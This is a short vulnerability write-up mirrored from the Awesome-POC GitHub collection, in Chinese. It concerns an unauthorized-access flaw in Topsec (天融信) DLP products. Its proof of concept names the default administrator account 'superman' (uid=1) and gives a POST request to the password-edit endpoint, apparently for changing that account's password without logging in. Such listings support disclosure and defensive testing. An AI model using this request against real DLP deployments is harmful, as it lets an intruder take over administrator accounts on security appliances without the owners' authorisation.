mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 11:58:05 +00:00
22 lines
257 B
Markdown
22 lines
257 B
Markdown
|
|
# 天融信 DLP 未授权访问漏洞
|
||
|
|
|
||
|
|
## 漏洞描述
|
||
|
|
|
||
|
|
天融信DLP存在未授权访问漏洞
|
||
|
|
|
||
|
|
## 漏洞影响
|
||
|
|
|
||
|
|
```
|
||
|
|
天融信DLP
|
||
|
|
```
|
||
|
|
|
||
|
|
## 漏洞复现
|
||
|
|
|
||
|
|
POC为
|
||
|
|
|
||
|
|
```plain
|
||
|
|
默认用户superman的uid=1
|
||
|
|
POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1
|
||
|
|
```
|
||
|
|
|